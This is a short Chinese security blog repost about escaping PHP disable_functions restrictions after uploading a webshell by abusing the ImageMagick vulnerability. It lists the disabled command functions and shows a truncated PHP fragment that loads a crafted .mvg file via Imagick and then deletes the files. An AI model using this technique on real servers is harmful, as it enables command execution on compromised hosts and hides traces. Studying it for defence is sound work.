最近ImageMagick漏洞比较火,上传一个图片,搞定一台服务器已经不在话下。。。收集一些大牛们YD的思路,供大学学习。。
当你上传了一个webshell,遇到下面的情况如何解决?
disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
根据以前的经验,有的是使用dl扩展来执行命令,不过我从未测试过,现在有了新的姿势,当然也是要有ImageMagick组件了。
readImage('KKKK.mvg'); $thumb->writeImage('KKKK.png'); $thumb->clear(); $thumb->destroy(); unlink("KKKK.mvg"); unlink("KKKK.png"); ?>
原文地址:http://zone.wooyun.org/content/27038
from www.waitalone.cn.thanks for it.
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论